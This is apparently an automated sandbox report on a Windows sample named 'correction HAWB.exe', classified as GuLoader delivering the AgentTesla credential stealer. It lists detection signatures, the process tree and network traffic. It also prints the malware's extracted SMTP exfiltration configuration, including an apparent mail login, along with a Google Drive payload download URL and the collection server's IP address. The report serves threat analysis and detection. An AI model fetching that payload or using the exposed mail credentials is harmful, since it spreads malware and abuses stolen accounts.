Loading ...

Play interactive tourEdit tour

Windows Analysis Report correction HAWB.exe

Overview

General Information

Sample Name:correction HAWB.exe
Analysis ID:1656
MD5:8a29580d47943a0f2c61ca552a63bc30
SHA1:e4cdec934b4bfc2e055216c03ac7056069100b05
SHA256:53c0cf2d25f350a579729af76c466b68b899586b620ffae8925fcb4d831dc2c8
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • correction HAWB.exe (PID: 7748 cmdline: 'C:\Users\user\Desktop\correction HAWB.exe' MD5: 8A29580D47943A0F2C61CA552A63BC30)
    • RegAsm.exe (PID: 6712 cmdline: 'C:\Users\user\Desktop\correction HAWB.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 396 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 5900 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 1772 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.3821567072.00000000022E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 6712JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 6712JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 116.0.120.83, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49771

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: UserOOBEBroker.exe.1772.17.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C89ED10 CryptUnprotectData,7_2_1C89ED10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C89F3A1 CryptUnprotectData,7_2_1C89F3A1
            Source: correction HAWB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49769 version: TLS 1.2
            Source: Binary string: RegAsm.pdb source: tKZVPq.exe, tKZVPq.exe.7.dr
            Source: Binary string: RegAsm.pdb4 source: tKZVPq.exe, 0000000C.00000002.4115929077.0000000000FE2000.00000002.00020000.sdmp, tKZVPq.exe, 0000000F.00000002.4195528975.00000000009A2000.00000002.00020000.sdmp, tKZVPq.exe.7.dr

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49771 -> 116.0.120.83:587
            Source: Joe Sandbox ViewASN Name: GTC-MY-PIP-ASGlobalTransitCommunications-MalaysiaMY GTC-MY-PIP-ASGlobalTransitCommunications-MalaysiaMY
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 116.0.120.83 116.0.120.83
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t4shmnlujbaqahk4bi15tv00ii385av2/1634178900000/16524389560697724177/*/1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-28-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49771 -> 116.0.120.83:587
            Source: global trafficTCP traffic: 192.168.11.20:49771 -> 116.0.120.83:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.8381893375.000000001DB81000.00000004.00000001.sdmpString found in binary or memory: http://AVyHehd5cM53ZVmf.org
            Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmpString found in binary or memory: http://AVyHehd5cM53ZVmf.org(6
            Source: RegAsm.exe, 00000007.00000002.8380892520.000000001DAF6000.00000004.00000001.sdmpString found in binary or memory: http://AVyHehd5cM53ZVmf.orgt-
            Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmpString found in binary or memory: http://JgQKqy.com
            Source: RegAsm.exe, 00000007.00000003.3793085932.0000000000DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000007.00000003.3793085932.0000000000DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000007.00000002.8381687035.000000001DB71000.00000004.00000001.sdmpString found in binary or memory: http://cselegance.com
            Source: RegAsm.exe, 00000007.00000002.8381687035.000000001DB71000.00000004.00000001.sdmpString found in binary or memory: http://mail.cselegance.com
            Source: UserOOBEBroker.exe, 00000011.00000002.8367603018.0000027B2F3F0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
            Source: RegAsm.exe, 00000007.00000003.3793085932.0000000000DC6000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-28-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-28-docs.googleusercontent.com/I
            Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t4shmnlu
            Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-28-docs.googleusercontent.com/eU
            Source: RegAsm.exe, 00000007.00000002.8369321022.0000000000D38000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/2wHG
            Source: RegAsm.exe, 00000007.00000002.8369321022.0000000000D38000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/Bw
            Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.8368434172.0000000000C00000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO
            Source: RegAsm.exe, 00000007.00000002.8369321022.0000000000D38000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oOUs
            Source: RegAsm.exe, 00000007.00000003.3793565096.0000000000DC1000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oOVsEG
            Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.8380502286.000000001DAB2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000007.00000002.8381984126.000000001DB87000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000007.00000002.8380502286.000000001DAB2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000007.00000002.8380111220.000000001DA61000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t4shmnlujbaqahk4bi15tv00ii385av2/1634178900000/16524389560697724177/*/1-G0aaBcc_jufuDxKNgbgyGXCFadOz4oO?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-28-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49769 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: correction HAWB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004022BB1_2_004022BB
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004034441_2_00403444
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_0040322C1_2_0040322C
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004034DC1_2_004034DC
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004032B61_2_004032B6
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_0040333F1_2_0040333F
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004033CA1_2_004033CA
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004031AB1_2_004031AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_008A11307_2_008A1130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_008A3A507_2_008A3A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_008AC2787_2_008AC278
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_008A43207_2_008A4320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_008ACFD87_2_008ACFD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_008A37087_2_008A3708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00C9C5D87_2_00C9C5D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00C9E29F7_2_00C9E29F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00C94EB07_2_00C94EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00C9FC187_2_00C9FC18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00C99DB87_2_00C99DB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00C91D287_2_00C91D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C89B9B07_2_1C89B9B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C8971067_2_1C897106
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C893D707_2_1C893D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C896E907_2_1C896E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C89C4287_2_1C89C428
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C89C3287_2_1C89C328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D895E087_2_1D895E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D894ACC7_2_1D894ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D895DC17_2_1D895DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1D896AF17_2_1D896AF1
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 12_2_00FE3DFE12_2_00FE3DFE
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 15_2_009A3DFE15_2_009A3DFE
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: String function: 0040177E appears 94 times
            Source: correction HAWB.exe, 00000001.00000000.3317832386.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnelega5.exe vs correction HAWB.exe
            Source: correction HAWB.exe, 00000001.00000002.3822812201.0000000002B70000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUnelega5.exeFE2X vs correction HAWB.exe
            Source: correction HAWB.exeBinary or memory string: OriginalFilenameUnelega5.exe vs correction HAWB.exe
            Source: correction HAWB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\correction HAWB.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
            Source: correction HAWB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\correction HAWB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\correction HAWB.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\correction HAWB.exe 'C:\Users\user\Desktop\correction HAWB.exe'
            Source: C:\Users\user\Desktop\correction HAWB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\correction HAWB.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
            Source: C:\Users\user\Desktop\correction HAWB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\correction HAWB.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\tKZVPqJump to behavior
            Source: classification engineClassification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@9/6@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: RegAsm.pdb source: tKZVPq.exe, tKZVPq.exe.7.dr
            Source: Binary string: RegAsm.pdb4 source: tKZVPq.exe, 0000000C.00000002.4115929077.0000000000FE2000.00000002.00020000.sdmp, tKZVPq.exe, 0000000F.00000002.4195528975.00000000009A2000.00000002.00020000.sdmp, tKZVPq.exe.7.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.3821567072.00000000022E0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_00403C72 push eax; iretd 1_2_00403C73
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_0040440B pushad ; iretd 1_2_00404415
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_00405ADE push esi; ret 1_2_00405AEC
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_00406AE7 push ss; iretd 1_2_00406AE8
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_0040695C push eax; ret 1_2_00406974
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_00406F76 push 0000002Ch; iretd 1_2_00406F78
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_004057DC push ecx; ret 1_2_004057E0
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_00407BBE push eax; retf 1_2_00407BBF
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_022E4A7F push eax; ret 1_2_022E4A85
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_022E08A6 push es; iretd 1_2_022E08A7
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_022E0B36 push B85A74BAh; iretd 1_2_022E0B3C
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_022E250C push eax; ret 1_2_022E250D
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_022E175C push eax; ret 1_2_022E175D
            Source: C:\Users\user\Desktop\correction HAWB.exeCode function: 1_2_022E2F59 push edx; ret 1_2_022E2F5A
